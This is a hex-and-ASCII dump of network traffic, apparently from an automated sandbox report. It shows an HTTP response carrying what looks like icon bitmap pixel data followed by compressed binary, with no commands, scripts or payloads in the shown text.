                                                                                              2021-12-07 12:39:07 UTC1883INData Raw: 22 6b ff 7a 1b 63 ff 64 13 4f ff 0a 01 08 ff 00 00 00 ff 00 00 00 ff 00 00 00 d0 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 00 00 00 fe 00 00 00 ff 00 00 00 ff 44 0c 36 ff 78 1a 60 ff 81 21 6a ff 89 29 72 ff 90 30 7a ff 97 36 82 ff 9d 3c 88 ff a2 41 8e ff a6 45 92 ff a9 49 96 ff ac 4b 98 ff ad 4d 9a ff af 4f 9b ff b0 50 9d ff b2 51 9e ff b3 53 a0 ff b4 54 a1 ff b6 55 a2 ff b7 56 a3 ff b8 58 a5 ff b9 59 a6 ff ba 5a a7 ff bb 5b a7 ff bc 5c a8 ff bc 5c a9 ff bf 5f ac ff c7 67 b3 ff cf 70 bc ff d6 77 c3 ff db 7c c8 ff df 80 cc ff e2 83 cf ff e4 85 d1 ff e6 87 d3 ff e7 88 d4 ff e8 89 d5 ff e8 89 d5 ff e8 89 d5 ff e8 89 d5 ff e8 89 d5 ff
                                                                                              Data Ascii: "kzcdOiD6x`!j)r0z6<AEIKMOPQSTUVXYZ[\\_gpw|
                                                                                              2021-12-07 12:39:07 UTC1891INData Raw: 6c b8 ff cc 6c b8 ff cc 6c b8 ff d0 70 bc ff e4 86 d1 ff e1 83 ce ff dc 7e c9 ff db 7d c8 ff da 7c c7 ff d9 7b c6 ff d8 7a c5 ff d7 79 c4 ff d6 78 c3 ff d5 77 c2 ff d4 75 c1 ff d3 74 c0 ff d1 71 be ff ce 6d ba ff c8 67 b4 ff c1 5e ac ff b9 53 a2 ff af 47 98 ff a4 3a 8b ff 94 2a 7a ff 18 05 13 ff 00 00 00 ff 00 00 00 ff 00 00 00 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 00 00 00 ff 00 00 00 ff 0b 02 09 ff 8f 28 76 ff a3 39 8a ff af 47 97 ff b9 53 a2 ff c1 5e ac ff c8 66 b4 ff cd 6d ba ff d1 72 be ff d3 75 c0 ff d4 76 c1 ff d6 77 c2 ff d7 78 c4 ff d8 79 c5 ff d9 7b c6 ff da 7c c7 ff db 7c c7 ff db 7d c8 ff dd 7f ca ff e2 84 cf ff e4 85 d1 ff cb 6b b8 ff ca 6a b6 ff ca 6a b6 ff b7 60 a5 ff 09 05 08 ff 70 6d 63 ff d0 ce c3 ff e0 df d7 ff
                                                                                              Data Ascii: lllp~}|{zyxwutqmg^SG:*zwZ(v9GS^fmruvwxy{||}kjj`pmc
                                                                                              2021-12-07 12:39:07 UTC1898INData Raw: 02 02 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 2d 11 27 ff 8e 36 7c ff 9d 3c 89 ff 9d 3c 89 ff 9f 3e 8b ff ca 71 b9 ff e9 98 da ff ea 9f dc ff ea a1 dd ff ea a1 dd ff e9 a1 dd ff e8 a0 dc ff e8 9f db ff e6 9d d9 ff e3 9a d7 ff df 95 d3 ff da 88 cc ff d4 6e be ff cd 63 b5 ff c5 58 ad ff be 4d a3 ff b5 41 99 ff 92 2c 7a ff 0e 04 0c ff 00 00 00 ff 00 00 00 ff 00 00 00 ec 00 00 00 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 00 00 00 fa 00 00 00 ff 00 00 00 ff 1c 07 17 ff a0 32 86 ff b6 43 9b ff
                                                                                              Data Ascii: -'6|<<>qncXMA,z+]2C
                                                                                              2021-12-07 12:39:07 UTC1906INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 e1 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 f6 00 00 00 81 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: 0
                                                                                              2021-12-07 12:39:07 UTC1914INData Raw: 1a 60 fe 6e 14 58 fe 5b 0d 47 fe 13 02 0e fe 00 00 00 fe 00 00 00 fe 00 00 00 96 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 00 00 00 fe 00 00 00 ff 16 03 11 fe 61 0f 4c ff 71 17 5b ff 7a 1d 64 fe 82 23 6c ff 88 29 73 ff 8e 2e 7a fe 93 33 7f ff 98 37 84 ff 9b 3a 87 ff 9e 3d 8a fe a0 3f 8c ff a1 41 8e ff a3 42 8f fe a4 43 90 ff a5 45 92 ff a6 46 93 fe a7 47 94 ff a8 47 94 ff a8 48 95 fe 9c 45 91 ff 59 32 7c ff 22 24 73 fe 0c 20 76 ff 0a 21 7c fe 0a 21 7d ff 0c 20 77 ff 22 24 74 fe 5a 32 7d ff 9c 45 91 ff a9 48 95 fe a8 48 95 ff a8 47 94 ff a7 46 93 fe a6 45 92 ff a5 44 91 ff a3 43 90 fe
                                                                                              Data Ascii: `nX[GaLq[zd#l)s.z37:=?ABCEFGGHEY2|"$s v!|!} w"$tZ2}EHHGFEDC
                                                                                              2021-12-07 12:39:07 UTC1922INData Raw: c3 4f ff 3d bc 3c fe 35 b8 31 ff 40 a7 0b ff db ed d0 fe fa fa f9 ff f6 f6 f4 ff cf cd c7 fe 04 04 03 ff 70 36 64 ff b9 59 a5 fe b9 59 a5 ff dd 7f ca ff e5 8a d3 fe e3 89 d2 ff e3 88 d2 ff e2 87 d1 fe e1 87 d0 ff e0 86 cf ff df 84 ce fe db 80 c9 ff d5 74 c1 ff cc 67 b6 fe c0 58 a9 ff b3 45 99 ff 94 2d 7b fe 02 00 02 ff 00 00 00 ff 00 00 00 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 fb 00 00 00 ff 54 17 45 fe ad 3d 93 ff bb 50 a3 fe c8 61 b1 ff d2 6e bd ff d9 7e c8 fe de 85 cd ff e0 87 cf ff e1 88 d0 fe e2 89 d1 ff e3 8a d2 ff e4 8b d3 fe e5 8b d4 ff e4 88 d2 ff b9 59 a5 ff b6 56 a2 fe 99 48 88 ff 01 00 01 ff 63 61 57 fe cb c9 bc ff dc db d2 ff e6 e5 df fe 88 c2 63 ff 39 a8 0d ff 39 b4 29 fe 48 ba 3b ff
                                                                                              Data Ascii: O=<51@p6dYYtgXE-{.TE=Pan~YVHcaWc99)H;
                                                                                              2021-12-07 12:39:07 UTC1930INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              2021-12-07 12:39:07 UTC1937INData Raw: 61 ad ff bb 5a a7 fe b2 50 9d ff a6 43 90 fe 98 33 80 ff 76 1e 60 fe 00 00 00 ff 00 00 00 fd 00 00 00 1b 00 00 00 00 00 00 00 00 00 00 00 3e 00 00 00 ff 07 01 06 ff 87 25 6f ff 9c 37 85 ff ab 47 95 ff b6 54 a2 ff be 5e ab ff c3 63 b0 ff c6 66 b2 ff c8 68 b5 ff ca 6a b7 ff cc 6c b9 ff ce 6e bb ff cf 70 bc ff d1 71 be ff da 7a c6 ff e3 84 d0 ff db 7c c8 ff d9 7a c6 ff d8 79 c5 ff 3f 23 3a ff 34 33 30 ff cd cb c3 ff eb ea e5 ff f2 f2 ef ff f6 f6 f4 ff d4 e8 c7 ff 8b c7 67 ff 5b b4 2e ff 40 ae 1b ff 40 ae 1b ff 5b b4 2f ff 8c c8 68 ff d8 ec cc ff fd fd fd ff fd fd fc ff fa fa f9 ff e0 de da ff 3a 39 37 ff 3f 23 3a ff d8 79 c5 ff d9 7a c6 ff db 7c c8 ff e3 84 d0 ff da 7a c7 ff d2 72 be ff d0 70 bd ff ce 6f bb ff cd 6d ba ff cb 6b b8 ff c9 69 b6 ff c7 67 b3 ff
                                                                                              Data Ascii: aZPC3v`>%o7GT^cfhjlnpqz|zy?#:430g[.@@[/h:97?#:yz|zrpomkig
                                                                                              2021-12-07 12:39:07 UTC1945INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 00 f8 00 00 00 fe 5c 32 53 ff dc 86 cb fe e6 9a d7 ff e2 95 d2 fe b3 64 a3 ff 04 02 03 fe 00 00 00 fe 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 59 00 00 00 a3 00 00 00 e0 00 00 00 fe 00 00 00 fe 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 fe 00 00 00 e0 00 00 00 a3 00 00 00 59 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 fe 03 01 03 ff ac 5d 9c fe dd 91 ce ff e5 99 d6 fe e0 8b cf ff 5e 34 56 fe 00 00 00 ff 00 00 00 f7 00 00 00 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: \2Sd(YY(]^4V
                                                                                              2021-12-07 12:39:07 UTC1953INData Raw: c1 57 ff f8 f9 f6 ff f2 f1 ee ff 64 62 5e ff 45 20 3e ff b4 53 a0 ff cd 6f ba ff e6 8d d5 ff e4 8c d4 ff e3 8b d3 ff e2 8a d2 ff df 86 ce ff d6 77 c3 ff c8 60 b1 ff b5 46 9b ff 4b 16 3e ff 00 00 00 fe 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c9 08 02 07 ff 9d 35 84 ff c0 54 a8 ff d0 6b bb ff dd 84 cc ff e2 8c d2 ff e4 8e d4 ff e5 8f d5 ff e6 8f d6 ff de 83 cd ff b0 4f 9c ff 85 3c 76 ff 05 05 05 ff 9a 97 8b ff d8 d6 cd ff e2 e3 d9 ff 87 c2 62 ff 3e a7 0b ff 3d a9 0f ff 43 ac 17 ff 43 ac 17 ff 3d a9 0f ff 3e a7 0b ff 8d c7 6a ff f3 f5 f0 ff f3 f3 f0 ff b5 b3 ad ff 06 06 06 ff 86 3c 77 ff b0 4f 9c ff de 84 cd ff e6 90 d6 ff e5 8f d5 ff e4 8e d4 ff e2 8d d3 ff dd 84 cc ff d1 6b bb ff c0 55 a8 ff 9d 35 85 ff 08 02 07 ff
                                                                                              Data Ascii: Wdb^E >Sow`FK>>5TkO<vb>=CC=>j<wOkU5
                                                                                              2021-12-07 12:39:07 UTC1961INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff f0 0f ff ff 80 01 ff fe 00 00 7f f8 00 00 1f f0 00 00 0f e0 00 00 07 c0 00 00 03 c0 00 00 03 80 00 00 01 80 00 00 01 80 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 03 c0 00 00 03 e0 00 00 07 e0 00 00 07 f0 00 00 0f f8 00 00 1f f0 00 00 0f f0 00 00 0f f0 00 00 0f f8 38 1c 1f fc 7f fe 3f ff ff ff ff 28 00 00 00 18 00 00 00 30 00 00 00 01 00 20 00 00 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: 8?(0 `
                                                                                              2021-12-07 12:39:07 UTC1969INData Raw: c3 d4 f6 d0 f6 07 01 06 1c cb 2e 00 98 c1 07 af 6f 9c 42 71 99 8a 44 f9 89 65 65 0a 6d 6e 9d da 44 c2 b3 12 d7 23 3c 28 bc 30 48 f7 68 e8 0e 8a 1a c4 e4 c1 48 bf b9 a0 24 54 58 3b 88 01 b8 73 b0 d7 44 54 dc e8 46 07 36 1e 02 00 8d 51 95 ef 6e ac 73 ff ed d8 a2 a5 67 3a 9e 67 94 98 fb 7b b4 ab f6 6a bf 52 5b 56 46 c1 0d ef 2a 07 83 7d 72 05 e7 41 a3 13 0a 64 0b 8a 1f 9a 2c b1 00 33 6a 9c 6a da aa 8f 09 8e 98 74 2d 91 2b c9 1b c7 5d 1b 65 9f 44 12 51 c7 8c 1c 86 03 df 94 86 42 79 90 97 3e b3 6c a2 22 84 13 d8 a4 d2 65 85 04 9c 2e 91 60 4e 26 0a 52 62 03 20 04 cc 33 2c 23 27 0a 61 bb 2b 20 ad dc 69 04 7f c5 48 44 23 50 1c 30 6c ec 04 05 1b a7 36 6b 77 1f 72 45 4d 02 fe bf 18 fb 88 00 7a 4d ca 8a b2 60 91 8b 36 d6 4f 9f 46 9b a7 37 cf ae 81 5b c9 52 cf b4 ca
                                                                                              Data Ascii: .oBqDeemnD#<(0HhH$TX;sDTF6Qnsg:g{jR[VF*}rAd,3jjt-+]eDQBy>l"e.`N&Rb 3,#'a+ iHD#P0l6kwrEMzM`6OF7[R
                                                                                              2021-12-07 12:39:07 UTC1977INData Raw: 4d 53 1c 55 c4 23 1c 3c f2 e7 1e 6b 39 80 7f f6 7e 20 4c dd 2a 87 af 80 29 5c 0c 28 c4 2a eb be ed 66 f1 1b 63 18 fc ed 01 be ff 0d 92 58 5f d6 57 fc 93 9e ea ec 15 ff 64 78 5b 5b c0 ed 7b 3e 9c 87 8c 19 70 d9 c2 04 81 63 94 86 bb f7 cf 25 6f eb d9 25 5d 56 02 9a 1d 7f 28 2b 90 8d f0 8f ac 24 2c 17 c0 7f 71 d1 e2 c1 fd 5f a5 ec 6a 61 81 a6 44 fb c9 e0 b0 4d 48 e0 a3 7f d6 8e d8 c6 39 5f 36 37 96 cb 29 a9 4a db f6 29 a7 8e 2d 5b 7e b4 e6 ca 29 37 a7 66 1d 5c f2 72 30 3d 5b c8 e4 1a ea 23 25 c0 7f e9 ff c6 6a 93 a2 49 b3 c9 88 a3 af 68 5d de 52 69 ed 50 99 a7 ff f1 09 30 02 f8 6f df b2 e8 a1 d7 6e d0 f4 d0 e9 2d c0 7f ed f5 66 82 a2 01 fe fb 55 0c b1 01 1a 82 b0 3d 1d a3 60 90 1e bc 7f bc ba 7d 66 cc af f8 6f 3a ca 2b fe 7b 1d 8b 2b 7b 7d 6e 89 fd 5d d7 f1
                                                                                              Data Ascii: MSU#<k9~ L*)\(*fcX_Wdx[[{>pc%o%]V(+$,q_jaDMH9_67)J)-[~)7f\r0=[#%jIh]RiP0on-fU=`}fo:+{+{}n]
                                                                                              2021-12-07 12:39:07 UTC1984INData Raw: 99 df 08 2e 00 ff fd 78 a2 6a 81 5f d1 4a c7 1b 49 33 27 dc 66 98 7c 15 36 b7 28 f0 f2 82 48 07 c5 d6 1a 4d 8d 93 12 10 70 16 fa 34 ac 72 ec 94 1e f9 f4 ca ff 0d 8b 91 45 c1 56 c8 3f 6a 24 62 6e c2 a0 4a 89 b1 9c 5a b0 9f 2a a7 7c de 27 8a 60 86 7b 92 f9 ae a4 bf b0 a2 d3 06 05 f4 cf 2a 0e a1 86 5d c2 b1 a8 d4 48 61 21 bf 32 f5 cc 5d e3 c8 7f e8 23 da e3 b1 7b ac cd 9d a2 40 8c be ea ff f2 d7 7b 81 fe ef fa f3 ab fe 4f d1 f5 55 ff d7 17 0a fa 1f e3 a9 67 be 6a c9 99 a7 5b 1c ca a9 70 ea 95 b7 f7 90 4d 16 82 77 31 3e ef a1 89 aa 21 40 fd d1 e2 7a 7f 65 af ba 2f c5 27 7f 8b d4 6c 9e ef 98 ed 1c 5b a0 65 bb 12 fe 29 6a d8 99 7d a3 10 04 f4 7f 1c fa 0f e3 17 14 b4 ee 58 22 09 7c e5 f8 d9 b3 0f be 4e 0f 4b 26 ad 6f 0d 49 91 08 5c e4 86 30 ba dc 43 68 12 63 5e
                                                                                              Data Ascii: .xj_JI3'f|6(HMp4rEV?j$bnJZ*|'`{*]Ha!2]#{@{OUgj[pMw1>!@ze/'l[e)j}X"|NK&oI\0Chc^
                                                                                              2021-12-07 12:39:07 UTC1992INData Raw: a0 ff 28 58 a0 0e ca 5e db f1 ad 26 07 f9 a7 17 92 47 2b bc 9f 50 58 64 49 51 58 a2 5d 42 72 1f 26 29 c4 2a 8f 51 18 68 aa 14 54 16 e0 e6 d8 56 04 6c 6f e8 6d d9 6e 04 78 58 c7 5c a5 e3 94 04 09 6f 0b be 55 20 2d 97 0e f0 80 fc 53 bd 45 4f a9 43 aa b4 77 f6 a1 f1 20 ff c8 48 c6 a4 68 b5 84 f7 07 73 2c c8 3f 1d 3d a5 98 97 63 28 3f 12 85 98 d9 4a 12 70 5b 71 94 d9 0f fe f9 5b 49 6d c7 19 e4 9f 6e ee 7e 46 3c f7 a4 3e 25 01 ff 3f 07 f0 3f 28 6a 83 fc 53 0f 89 4c 43 c4 06 71 f5 e7 41 90 7f 1a 0d ed bd 01 5b a7 e2 48 49 fe 2b 53 35 5e fc fe dc 0b f8 ff 8b b4 82 f7 68 f9 9b d2 0f e5 75 85 e9 01 fe 03 c5 08 f0 8f e7 b5 11 50 7f 21 4f 82 10 c8 3f 55 66 44 a2 eb 40 f5 62 60 17 93 06 fe 3f 35 e9 78 90 ff 1a 48 da 4e d9 5b e2 78 30 0b f2 5f 17 0f 81 fe 73 1b 21 9e
                                                                                              Data Ascii: (X^&G+PXdIQX]Br&)*QhTVlomnxX\oU -SEOCw Hhs,?=c(?Jp[q[Imn~F<>%??(jSLCqA[HI+S5^huP!O?UfD@b`?5xHN[x0_s!
                                                                                              2021-12-07 12:39:07 UTC2000INData Raw: 2f 2d 87 55 56 f9 b9 dc 26 20 16 8a ec f6 7c f2 37 b4 1d 97 c3 bb 80 c9 04 e3 e0 45 32 4b 34 28 56 c0 f6 93 90 0b 5f 85 9b ff 99 ea b7 64 b1 5e f3 f6 3b 90 7f c8 b3 66 72 f1 58 af 47 44 de 6b e0 2a f3 86 b6 b4 50 eb 7d 4e 52 b3 5b 93 7e fe bd 7b b2 b7 57 68 3d e3 30 d9 6e d4 3d 7f 33 35 51 83 cb eb fe 53 32 28 51 e4 23 3b 08 ed a4 fb 65 2d 7e 8d e4 40 be 8c c2 18 71 58 1b 1f c4 d5 7d 1c 09 19 ad 8e 34 e6 9c 79 6d 06 b0 ff 48 b4 8a d7 10 e8 3f 50 1e 12 3a ba 11 9b e5 94 ad 72 41 fe 41 78 79 d4 aa 30 31 e4 2a 09 a5 7c d2 4f d8 79 b2 b3 60 44 ef 1f da 8f 76 ff 38 21 f4 06 55 98 ee 87 fd 12 e2 33 69 05 43 83 c2 4b 57 aa 92 85 a8 c7 79 dc a8 99 d0 1c 1a 04 e2 a1 b3 a0 11 d2 96 3c 54 88 9c 5a 1c ae ac ec 2e 0a 10 79 4e 2e cd e4 8d 14 2d 2c c8 83 db 60 7e 85 16
                                                                                              Data Ascii: /-UV& |7E2K4(V_d^;frXGDk*P}NR[~{Wh=0n=35QS2(Q#;e-~@qX}4ymH?P:rAAxy01*|Oy`Dv8!U3iCKWy<TZ.yN.-,`~
                                                                                              2021-12-07 12:39:07 UTC2008INData Raw: 3d 99 67 9a 81 ce 76 cd bd e3 5b 94 c8 c6 2d 0e 22 c2 2b f0 ff 27 53 23 0e 89 90 9c fc 8e aa a4 0c 17 95 63 ac 19 d3 d9 d6 f7 2d 93 95 b7 58 2d 64 87 0e 5d 04 58 29 09 37 5d df 09 ea 14 db 54 44 17 b0 a9 c8 9e f5 51 fb a8 fd 32 2a 81 a3 a3 c5 2e 91 8e a0 ac ed 49 c2 36 bf 6b 69 25 f1 6d e5 50 9a 78 dc 51 f4 fe fb f8 2d dd 7c 9d 55 61 a3 7b 27 4c ae 6b bb d3 90 ae a0 ff ff f2 5c 7a d6 28 2a 49 e6 8e f5 b5 5b 63 e4 55 6d 7c 64 e0 a2 54 98 e5 29 bf 63 71 81 ba 3a a3 8f d6 01 19 0d fa 3a 3f d3 b1 6a bb 5d ca af 97 d0 10 8a 89 df 8a e3 b6 d8 a4 ac 35 0b f4 9a 37 39 b4 0b ef 69 d3 78 74 16 77 90 5e 94 a3 20 a5 bc d7 f8 e2 88 3f d3 87 5b b4 7c d2 0b 4f 36 33 c7 4e e9 f9 7e 7a 52 f4 7a ed 5d 86 bf 7a ad 7c 71 5b f1 55 d9 13 64 bc b7 6c f4 b6 7a 86 4f d7 b4 a6 6a
                                                                                              Data Ascii: =gv[-"+'S#c-X-d]X)7]TDQ2*.I6ki%mPxQ-|Ua{'Lk\z(*I[cUm|dT)cq::?j]579ixtw^ ?[|O63N~zRz]z|q[UdlzOj
                                                                                              2021-12-07 12:39:07 UTC2016INData Raw: e3 5d 51 7d a6 16 8d 1a ae ab bc b3 ad 70 eb a5 65 16 c3 95 5f 09 37 4c 45 32 76 b9 7c 73 d5 39 b0 6a f7 31 f6 97 bf 40 3d fd 2d be 73 7f 20 2d fc e5 1a 8e dd 39 a3 7b 4a 9e 53 d4 d3 8f 75 04 35 ba a4 44 5d 66 f3 49 af a0 cf bf ce a7 7a 29 65 35 bf dc e3 eb 56 a6 0c 79 1f c8 7f 88 a4 2c 33 0a a9 58 ac 36 e6 d7 c8 32 db 30 e7 7a 54 af e8 01 f9 3f 79 f2 c5 a5 9b d9 62 ac 3b bc ad aa d1 cf a8 af e7 53 11 26 5c c2 89 51 7c 18 9e 8a f0 7a 27 16 60 c5 3b 4b 2c 26 ae 7f 6b f2 04 f8 bf 65 a3 8b a6 a1 32 52 86 3f 75 59 fb 2c 87 da 5e 42 02 ef fd 91 08 ae 7c 72 6b c9 93 9b 5a f6 1a a7 1a f6 5c a9 d9 ec 7a 39 c6 c9 3c a7 8a d6 0e 35 4e b1 1f 13 64 04 82 fd bb d1 fa 4f b3 7f 75 91 71 bb 34 42 6a 78 75 61 b2 39 31 96 4b 0f f9 fc 8c 4f ba 5a 6c f4 db f3 0e 27 7a 4c eb
                                                                                              Data Ascii: ]Q}pe_7LE2v|s9j1@=-s -9{JSu5D]fIz)e5Vy,3X620zT?yb;S&\Q|z'`;K,&ke2R?uY,^B|rkZ\z9<5NdOuq4Bjxua91KOZl'zL
                                                                                              2021-12-07 12:39:07 UTC2023INData Raw: f0 ef b9 ac 14 9e 00 7e bf a2 21 24 36 f0 67 94 06 11 c7 03 ff 3d da 95 c0 db c0 9f 6b 45 8f b8 0d fc f1 2d d6 4c a3 c0 8f 54 c0 55 ce 02 7e 9b 52 5d bc ef c0 5f f8 6d 55 11 bd ff f4 e5 e9 5d 6c 36 e0 b7 39 4b 24 9f 08 fc 1b 45 a3 8a eb c0 ff 5a a6 e9 f0 2b f0 8b 55 0e 23 67 80 df e9 2b dc ff 0f fc a9 a2 8e 8e 67 80 9f d6 5d c0 6b 1d f8 9f ec 71 37 77 00 ff 73 6f 5a c9 59 e0 df df c3 d7 9f 00 fe 8a f5 91 d4 54 e0 5f b6 59 47 d4 02 7f 50 47 22 a3 33 f0 9f d0 13 eb 5d 00 fe 33 8d b1 a4 73 c0 ef 49 ba 42 67 06 fc 57 19 43 91 e1 c0 4f 7d 4d ab dc 0b f8 fd 97 b0 c4 7f 02 ff b3 1b 41 cc 92 c0 5f 7d 3f 05 d5 0c fc 5f 1f 6c d9 92 03 7f c1 e8 4a a1 05 f0 1b f0 0d 21 cf 03 ff 5b ca 20 62 19 e0 17 9e 5e 09 7c 0c fc a7 17 e8 11 9e c0 ef a4 65 cd b4 04 fc 54 8f 70 95
                                                                                              Data Ascii: ~!$6g=kE-LTU~R]_mU]l69K$EZ+U#g+g]kq7wsoZYT_YGPG"3]3sIBgWCO}MA_}?_lJ![ b^|eTp
                                                                                              2021-12-07 12:39:07 UTC2031INData Raw: 8d 9e 28 3d 9f 48 2e 2f 98 8a 5a ad 3c 2c 1d e1 74 87 44 78 47 ca 31 ea 29 67 f4 d7 33 53 08 1d f0 7f a7 37 4f 18 b8 ce 4d 44 e5 da 0a 58 8b a4 4f e7 d3 ab 9c f4 b6 e1 53 5a 7d 9b 52 77 55 c8 b9 29 9f 9a 98 db f4 c6 27 8d a9 cf 94 12 d6 f2 a5 7b 7a 49 b1 81 2d da 1e 15 69 4a bd f5 73 52 9f 8d ce b8 f8 6c 53 c9 95 19 65 7d a1 51 0d 35 69 97 eb c0 39 d2 08 77 b0 c1 51 4b 0b 26 eb fc 71 c4 9b 22 dc a7 9f 5e 9e a6 1f a6 44 65 5c 4c 14 fe b0 7e ff f0 05 13 13 f9 5a a8 9f 3b 51 bb 37 2a 92 24 9d 2b b4 c4 ad 83 c0 4b d0 71 13 e3 ff 13 b4 4e 0d 5c c1 5e d7 4b d2 74 ba eb 48 e1 fe 97 1f 42 1f 97 79 32 6f 13 82 ff 3f 71 95 e5 f8 a0 b5 b6 61 e4 c7 56 e7 b8 e9 12 15 c2 bc 7c 65 bc d4 bd c5 40 60 f5 f7 fd 2f 71 27 5d bf c9 df 17 6c fe 1c 97 73 3d 29 23 43 58 95 8e e0
                                                                                              Data Ascii: (=H./Z<,tDxG1)g3S7OMDXOSZ}RwU)'{zI-iJsRlSe}Q5i9wQK&q"^De\L~Z;Q7*$+KqN\^KtHBy2o?qaV|e@`/q']ls=)#CX
                                                                                              2021-12-07 12:39:07 UTC2039INData Raw: b9 8c 6b fb 26 10 1f 22 1b d8 1a 4e 6f eb 69 cf 04 32 e3 db 75 98 96 18 ca 6d ac 2a 3f d2 2b 18 4b 95 f2 a7 33 b7 f8 dc b6 5d c0 42 25 b2 3c a0 48 07 f1 1f ae 92 fd 73 f0 ad 22 d9 ec 06 f8 3f 03 e7 95 3c 8d 9d 81 eb 7c 78 dc f0 d2 6f 9e 79 92 4f 6d 4c ed fc 7c d5 d7 9a 0f c6 fb 02 84 05 c3 fa f9 df 0f 10 46 bf fb 9f 85 8e b5 cd 07 f4 27 b9 2a 1c c3 05 6a 4f fa 10 c6 b4 88 ce 8c 6f cc 22 1d 9b 55 bb 43 75 48 4d 8e 6f 58 38 49 b5 7c 15 f8 c8 f3 a5 ff 06 5d 54 9a ee 18 6f b8 91 97 d7 4a e7 05 fa 1f 04 af e2 09 e6 a1 ff 5d 16 e5 8b ae 7f b8 c1 fe 1f 0e 40 ff 9a f7 e5 d8 22 e8 42 c4 1f f7 d0 1d ae 0e 3a 2a 13 0b 87 94 fa 43 fe bf fc 43 d4 b3 d2 fd 07 05 ce 4f de e1 eb cc 63 70 f7 2d 9c 7f 0c 70 fe 85 ed a0 fb 5f d9 90 ff dc 2c 40 ff bf 39 82 fc 7f c8 19 6f 62
                                                                                              Data Ascii: k&"Noi2um*?+K3]B%<Hs"?<|xoyOmL|F'*jOo"UCuHMoX8I|]ToJ]@"B:*CCOcp-p_,@9ob
